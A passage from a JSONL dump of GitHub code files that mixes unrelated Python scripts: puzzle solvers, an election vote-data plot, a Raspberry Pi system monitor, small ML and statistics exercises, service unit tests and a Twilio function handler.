print(x)\n","repo_name":"vikassri/Python","sub_path":"Basic/Oops/clock/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30153805813","text":"import sys\nimport numpy as np\n\ndef read_positions():\n positions = []\n for line in sys.stdin:\n positions.append([[int(y) for y in x.split(\",\")] for x in line.strip().split(\"->\")])\n return np.array(positions)\n\ndef get_map_size(positions):\n return (np.max(positions[:, :, 0]) + 1, np.max(positions[:, :, 1]) + 1)\n\ndef draw_vert(_map, x, ys):\n [y1, y2] = ys\n if y1 < y2:\n _map[x, y1:y2 + 1] += 1\n else:\n _map[x, y2:y1 + 1] += 1\n return _map\n\ndef draw_hor(_map, xs, y):\n [x1, x2] = xs\n if x1 < x2:\n _map[x1:x2 + 1, y] += 1\n else:\n _map[x2:x1 + 1, y] += 1\n return _map\n\ndef draw_diag(_map, p):\n [[x1, y1], [x2, y2]] = p\n [x_diff, y_diff] = [x2 - x1, y2 - y1]\n x_incrementor = -1 if x_diff < 0 else 1\n y_incrementor = -1 if y_diff < 0 else 1\n\n [x, y] = [x1, y1]\n while True:\n _map[x, y] += 1\n if [x, y] == [x2, y2]:\n break\n x += x_incrementor\n y += y_incrementor\n\n return _map\n \n\ndef main():\n positions = read_positions()\n map_size = get_map_size(positions)\n _map = np.zeros(map_size, dtype=int)\n \n for p in positions:\n [[x1, y1], [x2, y2]] = p\n if x1 == x2:\n _map = draw_vert(_map, x1, [y1, y2])\n elif y1 == y2:\n _map = draw_hor(_map, [x1, x2], y1)\n else:\n _map = draw_diag(_map, p)\n print(\"Number of overlaps:\\t\" + str(np.count_nonzero(_map >= 2)))\n\nif __name__ == \"__main__\":\n main()","repo_name":"Limeman/advent_of_code","sub_path":"2021/day_5/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15058082733","text":"import pandas as pd\r\nimport numpy as np\r\nimport csv \r\nimport matplotlib.pyplot as plt\r\nimport datetime\r\n\r\nfrom datetime import datetime, timedelta\r\n\r\ntest = pd.read_csv(r'C:\\Elec\\nyt_ts.csv')\r\neevp_source = test['eevp_source']\r\n\r\n#set df (dataframe) to table\r\ndf = pd.read_csv (r'C:\\Elec\\nyt_ts.csv')\r\n\r\n#print (df)\r\n#print (eevp_source)\r\n\r\n#Save column eevp_source to file name eevp_source.csv\r\n#eevp_source.to_csv(r'C:\\Elec\\eevp_source.csv')\r\n\r\n#sort dataframe by vote_share_rep descending\r\n#df.sort_values(by=['vote_share_rep'], inplace=True, ascending=False)\r\n\r\n# sort by multiple columns: state and vote_share_rep\r\n\r\ntemp_table = df.sort_values(by=['state','timestamp'])\r\n\r\n#get rightmost 10 char for Date\r\nDate = temp_table['timestamp'].str[:10]\r\n\r\nmy_string=temp_table['timestamp']\r\n#print (my_string.str.split(\"T\",1))\r\n\r\n#add columns with split date/time ---'expand=True argument expands data across 2 columns\r\n#temp_table[['Date_Split','Time_Split']] = temp_table.timestamp.str.split(\"T\",1,expand=True)\r\n#_______________SPlit time stamp field by \"T\" convert formats of time and date and concatenate\r\n#split Time/Date and assign to 2 arrays, format both to pd.to_datetime\r\nDateTime = temp_table.timestamp.str.split(\"T\",1,expand=True)\r\nDate, Time = DateTime[0], DateTime[1]\r\nTime = Time.str[:-1] #remove Z off last charachter\r\n#_______________\r\nDate = pd.to_datetime(Date) # Convert to pandas date/time format\r\nDate_Format = Date.dt.strftime('%m/%d')\r\nTime = pd.to_datetime(Time)\r\nTime_Format = Time.dt.strftime('%H:%M') #Capitalize H, M, S for time format\r\nprint(Time_Format)\r\nDate_Time_Format = (Date_Format + \" \" + Time_Format)\r\nprint(Date_Time_Format)\r\n\r\n#______________convert timestamp to pd_to_datetime and subtract 4 hours for EST (previous string converts not needed)\r\nConvert_Time = pd.to_datetime(temp_table['timestamp']) - timedelta(hours = 5)\r\n\r\n#______________format to m/d H:M\r\nTime_adj = Convert_Time.dt.strftime('%m/%d %H:%M') #https://www.tutorialspoint.com/python/time_strftime.htm\r\n\r\n#insert columns with split date/time\r\ntemp_table.insert(loc=6, column='Time_Est', value=Convert_Time)\r\ntemp_table.insert(loc=7, column='Date_Split', value=Date_Format)\r\ntemp_table.insert(loc=8, column='Time_Split', value=Time_Format)\r\ntemp_table.insert(loc=9, column='Date_Time_Format', value=Date_Time_Format)\r\ntemp_table.insert(loc=10, column='Time_adj', value=Time_adj)\r\n\r\n#perform scalar calculations\r\nRep_Dem_VoteSplit = temp_table['vote_share_rep'] / (temp_table['vote_share_rep'] \\\r\n + temp_table['vote_share_dem'])\r\ntemp_table['Rep/Dem Vote Split'] = Rep_Dem_VoteSplit\r\n\r\n#user np.where for if...then, shift() defaults to previous row, diff(1) needs period specified to only return difference of prev row\r\n#if state = state from line above\r\ntemp_table['Vote_Batch'] = np.where(temp_table['state'].eq(temp_table['state'].shift()), temp_table['votes'].diff(1), 0)\r\n#.eq can be used on columns or entire dataframe\r\n\r\n#replace negative values with zero\r\ntemp_table['Vote_Batch'] = np.where(temp_table['Vote_Batch'] < 0, 0, temp_table['Vote_Batch'])\r\n\r\ntemp_table['Cum_Rep_Votes'] = temp_table['vote_share_rep'] * temp_table['Vote_Batch']\r\n\r\nprint (temp_table)\r\n\r\n#SAVE DATAFRAME\r\n#temp_table.to_csv(r'C:\\Elec\\temp_table.csv')\r\n\r\n#get portion of dataframe based on value of column\r\n#df.loc[df['column_name'].isin(some_values)]\r\n\r\n#**********************************************************\r\nName_State = \"texas\"\r\n\r\n#***********************************************************\r\nstate = temp_table.loc[temp_table['state'] == Name_State]\r\nprint(state['Time_Est'].index)\r\nShenaniganStart = pd.to_datetime('2020-11-04 01:00').tz_localize('UTC') #attach a timezone to match with search range timezone\r\nShenaniganEnd = pd.to_datetime('2020-11-04 07:00').tz_localize('UTC')\r\n#find closest value in range\r\nidx =state['Time_Est'].sub(ShenaniganStart).abs().idxmin()\r\nidx2 =state['Time_Est'].sub(ShenaniganEnd).abs().idxmin()\r\nprint(idx)\r\n\r\ntestvar =state['vote_share_rep'].sub(.6).abs().idxmin()\r\n\r\nstate_sum = state['Vote_Batch'].sum()\r\n\r\n#Build even time series around first and last date/time of sample\r\nFirst_Date = pd.to_datetime(state['Time_Est'].head(1))\r\nLast_Date = pd.to_datetime(state['Time_Est'].tail(1))\r\n\r\nFirst_Date = First_Date.dt.strftime('%Y-%m-%d %H:%M') #format to YYYY-M-D H:M\r\nLast_Date =Last_Date.dt.strftime('%Y-%m-%d %H:%M')\r\n\r\nFirst_Date = First_Date.values[0] #knock off index number, just get value\r\nLast_Date = Last_Date.values[0]\r\n\r\nprint(First_Date)\r\n\r\n#range = pd.date_range('2009-06-01 05:00', '2009-06-30 05:00', freq='1H')\r\nrange = pd.date_range(First_Date, Last_Date, periods=len(state['Time_Est']))\r\n#t_index = pd.DatetimeIndex(pd.date_range(start='2009-06-01', end='2009-06-30'), freq=\"1h\")\r\n\r\nprint(range)\r\n#Dual Y axis plot attempt #1\r\n#plt.tight_layout()\r\n\r\n\r\nax = state.plot(kind='line', x='Time_adj', y='Rep/Dem Vote Split', color='blue', style='.', \\\r\n legend=False, rot=45, figsize=(10,7))\r\nax2 = state.plot(kind='bar', x='Time_adj', y='votes', color='red', secondary_y=True, \\\r\n ax = ax.twinx(), rot =45, alpha = .2, width = 1, legend=False, figsize=(10,7)) #alpha = transparency\r\nax3 = state.plot(kind='line', x='Time_adj', y='votes2016', color='green', secondary_y=True, \\\r\n ax = ax2, linewidth=2, alpha = 1, linestyle = \":\") \r\nax4 = state.plot(kind='line', x='Time_adj', y='votes2012', color='purple', secondary_y=True, \\\r\n ax = ax2, linewidth=2, alpha = 1, linestyle = \":\") \r\nax.axvline(idx-state.head(1).index, color='black', linestyle='-', lw=.5, alpha = .5) # take index number minus first index number of 'state'\r\nax.axvline(idx2-state.head(1).index, color='black', linestyle='-', lw=.5, alpha = .5) # take index number minus first index number of 'state'\r\n\r\nax3.legend(frameon=False)\r\nax2.legend([\"Total Votes 2016\", \"Total Votes 2012\", \"Cumulative Votes 2020\"], loc=\"upper left\")\r\nprint(state)\r\n\r\nplt.title(Name_State)\r\n#ax.set_xticklabels(ax, fontsize=8)\r\n\r\n#ax.grid(axis='y',b=True, which='both', color='0.65')\r\n# Major ticks every 20, minor ticks every 5\r\nmajor_ticks = np.arange(.25, .75, .25)\r\nminor_ticks = np.arange(.25, .75, .1)\r\nax.set_yticks(major_ticks)\r\nax.set_yticks(minor_ticks, minor=True)\r\nax.grid(axis='y', which='major', alpha =.75 , linestyle='-', color='0.25')\r\nax.grid(axis='y', which='minor', alpha = .25, linestyle='--', color='0.65')\r\n\r\nax.set_ylabel('% Trump/Biden', color='b')\r\nax2.set_ylabel('Total # Votes (MM)', color='r')\r\nax.set_xlabel('Time EST')\r\n\r\n#ax.yaxis.set_major_locator(.1)\r\n#ax.yaxis.set_major_locator(plt.MaxNLocator(6)) #manually set number of ticks across y axis\r\nax2.xaxis.set_major_locator(plt.MaxNLocator(20)) \r\n\r\nax.tick_params(axis=\"x\", labelsize=8)\r\n\r\nbob = ax.legend()\r\n# ax.legend(loc=0)\r\nprint(state_sum)\r\nplt.show()\r\n\r\n\r\n","repo_name":"BoxCarWilly/Repo1","sub_path":"ElecData.py","file_name":"ElecData.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8756461668","text":"# Add the functions in this file\nimport json\ndef load_journal(x):\n \n f=open(x)\n l=json.load(f)\n f.close()\n return l\n\ndef compute_phi(fn,ev):\n jfile=load_journal(fn)\n x=[]\n y=[]\n n11=n00=n01=n10=0\n n1_=n_1=n0_=n_0=0\n for i in jfile:\n if ev in i['events']:\n x.append(True)\n else:\n x.append(False)\n y.append(i['squirrel'])\n \n for i in range(len(jfile)):\n if x[i] and y[i]:\n n11+=1\n if not x[i] and not y[i]:\n n00+=1\n \n if x[i] and not y[i]:\n n10+=1\n if not x[i] and y[i]:\n n01+=1\n if x[i]:\n n1_+=1\n if not x[i]:\n n0_+=1\n if y[i]:\n n_1+=1\n if not y[i]:\n n_0+=1\n #print(n11,n00,n01,n10,n1_,n_1,n0_,n_0)\n a=(n11*n00) - (n10*n01)\n b=(n1_*n0_*n_1*n_0)**(0.5)\n #print(a,b)\n return ((n11*n00) - (n10*n01))/(n1_*n0_*n_1*n_0)**(0.5)\n\ndef compute_correlations(fn):\n jfile=load_journal(fn)\n d={}\n for i in jfile:\n for j in i['events']:\n if j not in d:\n d[j]=compute_phi(fn,j)\n return d\n\ndef diagnose(fn):\n d=compute_correlations(fn)\n cal=d.values()\n for key,value in d.items():\n if value==max(cal):\n a=key\n if value==min(cal):\n b=key\n return a,b\n\n\n\n\n\n\n","repo_name":"Genskill2/004-bootcamp-json-abhiarik","sub_path":"correlation.py","file_name":"correlation.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38217979195","text":"#-*- encoding:utf-8 -*-\n#/usr/bin/ipython3\n\nimport sys,os,time,json,urllib,shelve,random,datetime,collections,math\nimport gensim\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model, datasets\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import accuracy_score,recall_score,roc_auc_score,confusion_matrix,classification_report\n\ntrain_path = 'input/train_201701_201704_mod100.csv'\nvalid_path = 'input/valid_201701_201704_mod100.csv'\n\nTRAIN_FEATS = [\n 'user_city',\n 'past_tag_num',\n 'item_sex_0_ctr', \n 'item_sex_1_ctr', \n 'item_age_0_ctr', #-,20\n 'item_age_1_ctr', #20,30\n 'item_age_2_ctr', #30,40\n 'item_age_3_ctr', #40,50\n 'item_city_0_ctr',\n 'item_city_1_ctr',\n ]\nTRAIN_FEATS = [\n 'user_sex',\n 'user_age',\n 'user_city',\n 'past_tag_num',\n 'user_sex_0',\n 'user_sex_1',\n 'user_age_1',\n 'user_age_2',\n 'user_age_3',\n 'user_city_0',\n 'user_city_1',\n 'user_city_3',\n 'item_sex_0_ctr',\n 'item_sex_1_ctr',\n 'item_age_0_ctr',\n 'item_age_1_ctr',\n 'item_age_3_ctr',\n 'item_city_0_ctr',\n 'item_city_1_ctr',\n ]\ndf = pd.read_csv(train_path)\nX_train, y_train = df[TRAIN_FEATS].values, df.label.values\n\ndf = pd.read_csv(valid_path)\nX_valid, y_valid = df[TRAIN_FEATS].values, df.label.values\n\nlr = linear_model.LogisticRegression(C=1e4)\nlr.fit(X_train, y_train)\n\nthreshold = 0.2\n\nprint(\"train summary:\")\nprint(classification_report(y_true=y_train, y_pred=np.where(lr.predict_proba(X_train)[:,1] > threshold, 1, 0)))\n\nprint(\"test summary:\")\nprint(classification_report(y_true=y_valid, y_pred=np.where(lr.predict_proba(X_valid)[:,1] > threshold, 1, 0)))\n\n# df = pd.read_csv(train_path)\n# X,y = df[TRAIN_FEATS].values, df.label.values\n# kf = KFold(n_splits=2)\n# lr = None\n# for train, test in kf.split(X):\n# print()\n# print('kfold train:%d test:%d' % (len(train), len(test)))\n# X_train = X[train]\n# y_train = y[train]\n# X_test = X[test]\n# y_test = y[test]\n# lr = linear_model.LogisticRegression(C=1e5)\n# lr.fit(X_train, y_train)\n\n# y_true = y_train\n# y_pred = np.where(lr.predict_proba(X_train)[:,1] > threshold, 1, 0)\n# print(\"train summary:\")\n# print(classification_report(y_true, y_pred))\n\n# y_true = y_test\n# y_pred = np.where(lr.predict_proba(X_test)[:,1] > threshold, 1, 0)\n# print(\"valid summary:\")\n# print(classification_report(y_true, y_pred))\n\n","repo_name":"liuslevis/Word2Rec","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"18622432171","text":"import os\nimport time\nfrom prettytable import PrettyTable\nimport sys\n \n# Return CPU temperature as a character string \ndef getCPUtemperature():\n res = os.popen('vcgencmd measure_temp').readline()\n return(res.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\"))\n \n# Return RAM information (unit=kb) in a list \n# Index 0: total RAM \n# Index 1: used RAM \n# Index 2: free RAM \ndef getRAMinfo():\n p = os.popen('free')\n i = 0\n while 1:\n i = i + 1\n line = p.readline()\n if i==2:\n return(line.split()[1:4])\n \n# Return % of CPU used by user as a character string \ndef getCPUuse():\n return(str(os.popen(\"top -n1 | awk '/Cpu\\(s\\):/ {print $2}'\").readline().strip(\\\n)))\n \n# Return information about disk space as a list (unit included) \n# Index 0: total disk space \n# Index 1: used disk space \n# Index 2: remaining disk space \n# Index 3: percentage of disk used \ndef getDiskSpace():\n p = os.popen(\"df -h /\")\n i = 0\n while 1:\n i = i +1\n line = p.readline()\n if i==2:\n return(line.split()[1:5])\n \n \n \nif __name__ == '__main__':\n title = ['item','value']\n t = PrettyTable(title)\n while 1:\n t.clear_rows()\n # CPU informatiom\n CPU_temp = getCPUtemperature()\n CPU_usage = getCPUuse()\n \n # RAM information\n # Output is in kb, here I convert it in Mb for readability\n RAM_stats = getRAMinfo()\n RAM_total = round(int(RAM_stats[0]) / 1000,1)\n RAM_used = round(int(RAM_stats[1]) / 1000,1)\n RAM_free = round(int(RAM_stats[2]) / 1000,1)\n \n # Disk information\n DISK_stats = getDiskSpace()\n DISK_total = DISK_stats[0]\n DISK_used = DISK_stats[1]\n DISK_perc = DISK_stats[3]\n\n t.add_row(['CPU Temperature',CPU_temp])\n t.add_row(['CPU Use',CPU_usage + '%'])\n t.add_row(['RAM Total',str(RAM_total)+' MB'])\n t.add_row(['RAM Used',str(RAM_used)+' MB'])\n t.add_row(['RAM Free',str(RAM_free)+' MB'])\n t.add_row(['DISK Total Space',str(DISK_total)+'B'])\n t.add_row(['DISK Used Space',str(DISK_used)+'B'])\n t.add_row(['DISK Used Percentage',str(DISK_perc)])\n \n os.system('clear')\n print(t)\n\n ","repo_name":"YooPh/PythonCodeList","sub_path":"获取树莓派状态信息/GetPiStatus.py","file_name":"GetPiStatus.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5686784473","text":"def dat(a, b):\r\n z = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30]\r\n d = 0\r\n for j in range(0, a - 1):\r\n d += z[j]\r\n if b % 4 == 0 and a > 2:\r\n d += 1\r\n return d\r\n\r\ndef word(x):\r\n if x == 0:\r\n return \"Monday\"\r\n elif x == 1:\r\n return \"Tuesday\"\r\n elif x == 2:\r\n return \"Wednesday\"\r\n elif x == 3:\r\n return \"Thursday\"\r\n elif x == 4:\r\n return \"Friday\"\r\n elif x == 5:\r\n return \"Saturday\"\r\n elif x == 6:\r\n return \"Sunday\"\r\n\r\ny = list(map(int, input().split()))\r\na = y[2] % 100\r\nb = y[2] // 100\r\nif a % 2 == 1:\r\n a += 11\r\na = int(a / 2)\r\nif a % 2 == 1:\r\n a += 11\r\na = 7 - (a % 7)\r\nb = 5*(b % 4) % 7 + 1\r\na = (a + b) % 7\r\nc = y[0] + dat(y[1], y[2])\r\nc = c % 7 - 3\r\nc += a\r\nif y[2] % 4 == 0 and y[1] <= 2:\r\n if y[2] % 400 == 0 or y[2] % 100 != 0:\r\n c -= 1\r\nc = c % 7\r\nprint(word(c))","repo_name":"MediocreBoris/gitgud","sub_path":"Weekday.py","file_name":"Weekday.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29316583591","text":"#!/usr/bin/env python\n\nimport unittest\nimport Queue\nimport grabber\n\nclass TestGrabber(unittest.TestCase):\n def setUp(self):\n self.feed_queue = Queue.Queue()\n self.grabber = grabber.Grabber(self.feed_queue)\n\n def test_clear_tables(self):\n self.grabber.clear_tables('AA')\n feed_name, action = self.grabber.feed_queue.get()\n self.assertEqual(feed_name, 'AA')\n self.assertEqual(action, 'clear_table')\n\n def test_read_config(self):\n self.grabber.read_config()\n feed_name = self.grabber.feeds[0][0]\n self.assertEqual(feed_name, 'hn')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"diarized/rss2irc","sub_path":"tests/unit/test_grabber.py","file_name":"test_grabber.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"42649826833","text":"import os\nfrom urllib.parse import unquote\n\nfrom requestHandler import validate_request\nfrom textHandler import parse_text, send_acknowledgement_text\nfrom pubsubHandler import launch_app\n\n\n## Terraform bools not capitalized unlike Python\nDEBUG = True if os.environ[\"debug\"] == \"true\" else False\n\n\n## https://flask.palletsprojects.com/en/1.1.x/api/#incoming-request-data\ndef main(request):\n if DEBUG: print(\"DEBUG: starting Twilify reception main function\")\n\n ## validate text event\n source_num = unquote(validate_request(request.form))\n if not source_num:\n return\n if DEBUG: print(\"DEBUG: validated text event\")\n\n ## parse text event for any keywords\n playlist_params = parse_text(DEBUG, request.form[\"Body\"])\n\n ## Generate acknowledgement text response\n choices_captured = \"Message received!\"\n if len(playlist_params.keys()) > 0:\n choices_captured = \" \".join(playlist_params.keys()) + \" requests captured\"\n \n ## if user requested music, acknowledge and echo back any keywords detected\n if \"seeds\" not in playlist_params:\n response_body = \"New music update coming right away. \\n\"\n send_acknowledgement_text(DEBUG, source_num, response_body+choices_captured)\n\n ## launch app with parameters and number to txt back to\n playlist_params[\"user_number\"] = source_num\n if DEBUG: print(\"DEBUG: Launching Twilify app\")\n message_response = launch_app(playlist_params)\n\n if DEBUG: print(f\"DEBUG: {message_response}\")\n return {\n \"status\": \"200\",\n \"body\": \"success\"\n }\n","repo_name":"nbailey20/Twilify","sub_path":"gcp/functions/twilify-reception/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29256238897","text":"import pytest\nimport yatest.common\nimport json\n\nimport yt.wrapper as yt\n\nfrom maps.garden.sdk.test_utils import data\n\nfrom maps.garden.sdk.core import Version\nfrom maps.garden.sdk.resources import FileResource\nfrom maps.garden.sdk.yt import YtDirectoryResource\n\nfrom maps.garden.modules.offline_search_cache_validator.lib import tests_splitter\nfrom maps.garden.modules.offline_search_cache_validator.lib import offline_search_cache_validator\nfrom maps.garden.modules.offline_search_cache_validator.lib.resource_names import GEOID_TREES_BY_POVS\n\nVERSION = \"09.02.22-0\"\n\n\ndef _create_tables(yt_client, geosrc_dir_resource, data_path):\n\n def _create_table(path, schema):\n yt_table_path = yt.ypath_join(geosrc_dir_resource.path, path)\n yt_client.create(\"table\", yt_table_path, attributes={\"schema\": schema}, recursive=True)\n yt_client.write_table(yt_table_path, data.read_table_from_file(data_path + \"/input\", path))\n\n toponyms_schema = data.read_table_from_file(data_path + \"/schema\", \"toponyms\")\n hierarchy_schema = data.read_table_from_file(data_path + \"/schema\", \"hierarchy\")\n\n _create_table(\"toponyms\", toponyms_schema)\n _create_table(\"pov/RU/hierarchy\", hierarchy_schema)\n _create_table(\"pov/UA/hierarchy\", hierarchy_schema)\n\n\ndef _create_geosrc_dir_resource(environment_settings):\n GEOCODER_DATA_PATH = yatest.common.test_source_path(\"data\")\n geosrc_dir_resource = YtDirectoryResource(\n name=offline_search_cache_validator.GEOSRC_YT,\n filename_template=\"//tmp/geocoder_export\",\n server=\"hahn\")\n geosrc_dir_resource.version = Version(properties={\"release\": VERSION})\n geosrc_dir_resource.load_environment_settings(environment_settings)\n yt_client = geosrc_dir_resource.get_yt_client()\n try:\n _create_tables(yt_client, geosrc_dir_resource, GEOCODER_DATA_PATH)\n except BaseException: # yt.common.YtResponseError():\n pass\n return geosrc_dir_resource\n\n\n@pytest.mark.use_local_yt(\"hahn\")\ndef test_load_toponyms_hierarchy(environment_settings):\n geosrc_dir_resource = _create_geosrc_dir_resource(environment_settings)\n yt_client = geosrc_dir_resource.get_yt_client()\n\n # YT data dependent tests. See input/pov/*/hierarchy\n toponym_to_geoid = tests_splitter.read_toponyms_yt(yt_client, geosrc_dir_resource.path)\n assert toponym_to_geoid == {\"1\": \"1\", \"3\": \"10\", \"4\": \"12\"}\n assert len(toponym_to_geoid) == 3\n assert toponym_to_geoid[\"1\"] == \"1\"\n assert toponym_to_geoid[\"3\"] == \"10\"\n assert toponym_to_geoid[\"4\"] == \"12\"\n\n cache_geoids = [\"1\", \"10\"] # Imagine we have only these two caches\n\n ru_hierarchy = tests_splitter.read_hierarchy_yt(yt_client, geosrc_dir_resource.path, toponym_to_geoid, \"RU\", cache_geoids)\n assert set(ru_hierarchy[\"1\"]) == set(\"1\")\n assert set(ru_hierarchy[\"10\"]) == set([\"1\", \"10\"])\n assert set(ru_hierarchy[\"12\"]) == set([\"1\", \"10\"])\n\n all_values = set()\n for geoids in ru_hierarchy.values():\n for geoid in geoids:\n all_values.add(geoid)\n assert all_values == set(cache_geoids) # All caches present and No extra caches left\n\n ua_hierarchy = tests_splitter.read_hierarchy_yt(yt_client, geosrc_dir_resource.path, toponym_to_geoid, \"UA\", cache_geoids)\n assert set(ua_hierarchy[\"1\"]) == set(\"1\")\n assert set(ua_hierarchy[\"10\"]) == set([\"10\"])\n assert set(ua_hierarchy[\"12\"]) == set([\"10\"])\n\n all_values = set()\n for geoids in ua_hierarchy.values():\n for geoid in geoids:\n all_values.add(geoid)\n assert all_values == set(cache_geoids)\n\n\ndef test_split_testset():\n testset = {\"tests\": [\n {\"expected\": {\"geoid\": 12}, \"request\": {\"lang\": \"ru_RU\", \"geocode\": \"test1\"}}, # Should be tested on geoid 12 and all its RU ancestors (1, 10)\n {\"expected\": {\"geoid\": 12}, \"request\": {\"lang\": \"uk_UA\", \"geocode\": \"test2\"}}, # Should be tested on geoid 12 and all its UA ancestors (10)\n {\"expected\": {\"geoid\": 10}, \"request\": {\"lang\": \"ru_RU\", \"geocode\": \"test3\"}},\n {\"expected\": {\"geoid\": 10}, \"request\": {\"lang\": \"uk_UA\", \"geocode\": \"test4\"}},\n {\"expected\": {\"geoid\": 1}, \"request\": {\"lang\": \"ru_RU\", \"geocode\": \"test5\"}},\n {\"expected\": {\"geoid\": 1}, \"request\": {\"lang\": \"uk_UA\", \"geocode\": \"test6\"}},\n {\"expected\": {\"geoid\": 1}, \"request\": {\"lang\": \"tr_TR\", \"geocode\": \"test7\"}}, # No cache for TR to be tested on\n ]}\n\n geoid_trees = { # geoid -> [ancestors and self]\n \"RU\": {\"1\": [\"1\"], \"10\": [\"1\", \"10\"], \"12\": [\"1\", \"10\", \"12\"]},\n \"UA\": {\"1\": [\"1\"], \"10\": [\"10\"], \"12\": [\"10\", \"12\"]},\n }\n\n split_tests = tests_splitter.split_testset_by_geoid_and_locale(testset, geoid_trees)\n\n def expect(split, expected):\n split_tests = set()\n for test in split:\n split_tests.add(test[\"request\"][\"geocode\"])\n\n assert split_tests == set(expected)\n\n expect(split_tests[\"1\"][\"ru_RU\"], [\"test1\", \"test3\", \"test5\"]) # All ru_RU tests related to geoid 1 or any of its RU children (10, 12)\n expect(split_tests[\"10\"][\"ru_RU\"], [\"test1\", \"test3\"])\n expect(split_tests[\"12\"][\"ru_RU\"], [\"test1\"])\n expect(split_tests[\"1\"][\"uk_UA\"], [\"test6\"])\n expect(split_tests[\"10\"][\"uk_UA\"], [\"test2\", \"test4\"])\n expect(split_tests[\"12\"][\"uk_UA\"], [\"test2\"])\n\n\n@pytest.mark.use_local_yt(\"hahn\")\ndef test_BuildGeoidTreesTask(environment_settings): # All the tests as above combined to a Task\n path, content = (\"fake_cache_file\", b\"fake cache data\")\n name = \"fake_cache\"\n cache_resource = FileResource(name, path)\n cache_resource.version = Version(properties={\"release\": VERSION})\n cache_resource.load_environment_settings(environment_settings)\n\n with cache_resource.open(\"wb\") as file:\n file.write(content)\n\n cache_resource.logged_commit()\n assert cache_resource.physically_exists\n\n caches = {\n \"search_2_cache_file_ru_RU_1_single_file\": cache_resource,\n \"search_2_cache_file_ru_RU_10_single_file\": cache_resource,\n \"search_2_cache_file_uk_UA_1_single_file\": cache_resource,\n \"search_2_cache_file_uk_UA_10_single_file\": cache_resource\n }\n\n # Create output resource\n geoid_trees_resource = FileResource(GEOID_TREES_BY_POVS, \"geoid_trees.json\")\n geoid_trees_resource.version = Version(properties={\"release\": VERSION})\n geoid_trees_resource.load_environment_settings(environment_settings)\n\n geosrc_dir_resource = _create_geosrc_dir_resource(environment_settings)\n\n # Run task\n task = tests_splitter.BuildGeoidTreesTask()\n task.load_environment_settings(environment_settings)\n task(geoid_trees=geoid_trees_resource, geosrc=geosrc_dir_resource, **caches)\n\n with open(geoid_trees_resource.path()) as res:\n trees = json.load(res)\n\n assert trees == {\n \"RU\": {\"1\": [\"1\"], \"10\": [\"1\", \"10\"], \"12\": [\"1\", \"10\"]},\n \"UA\": {\"1\": [\"1\"], \"10\": [\"10\"], \"12\": [\"10\"]},\n }\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_splitter.py","file_name":"test_splitter.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36276764907","text":"from common import inventory_attributes, management_client, clean_db, mongo\n\nimport os\nimport pytest\nimport random\n\n\n@pytest.mark.usefixtures(\"clean_db\")\nclass TestDeviceCreation:\n\n def verify_inventory(self, inventory, expected):\n assert len(inventory) == len(expected)\n\n print(\"inventory:\", inventory, \"expected:\", expected)\n for e in expected:\n if e not in inventory:\n assert False, \"Inventory data is incorrect\"\n\n\n def test_create_device_id_too_large(self, management_client, inventory_attributes):\n deviceid = \"\".join([ format(i, \"02x\") for i in os.urandom(508)])\n deviceNew = management_client.deviceNew(id=deviceid,\n attributes=inventory_attributes)\n try:\n r, _ = management_client.client.devices.post_devices(device=deviceNew,\n Authorization=\"foo\").result()\n except Exception as e:\n assert e.response.status_code == 500\n else:\n pytest.fail()\n\n def test_create_device_id_too_small(self, management_client, inventory_attributes):\n deviceNew = management_client.deviceNew(id=\"\",\n attributes=inventory_attributes)\n try:\n management_client.client.devices.post_devices(device=deviceNew,\n Authorization=\"foo\").result()\n except Exception as e:\n assert \"ID: non zero value required\" in str(e)\n\n def test_create_device_and_get(self, management_client, inventory_attributes):\n deviceid = \"\".join([ format(i, \"02x\") for i in os.urandom(128)])\n\n deviceNew = management_client.deviceNew(id=deviceid,\n attributes=inventory_attributes)\n management_client.client.devices.post_devices(device=deviceNew,\n Authorization=\"foo\").result()\n r, _ = management_client.client.devices.get_devices_id(id=deviceid,\n Authorization=\"foo\").result()\n self.verify_inventory(inventory_attributes,\n [management_client.inventoryAttribute(name=attr.name,\n value=attr.value,\n description=attr.description) \\\n for attr in r.attributes])\n\n def test_get_client_nonexisting_id(self, management_client):\n deviceid = \"test\" + str(random.randint(0, 99999999))\n try:\n r, _ = management_client.client.devices.get_devices_id(id=deviceid,\n Authorization=\"foo\").result()\n except Exception as e:\n assert e.response.status_code == 404\n else:\n pytest.fail()\n","repo_name":"PiotrPrzybylak/inventory","sub_path":"tests/tests/test_creating_devices.py","file_name":"test_creating_devices.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"34962396106","text":"#!/bin/python\nimport random\n\n# Complete the function below to print 2 integers separated by a single space which will be your next move\ndef nextMove(player,board):\n print (1, 0)\n\n\n#If player is X, I'm the first 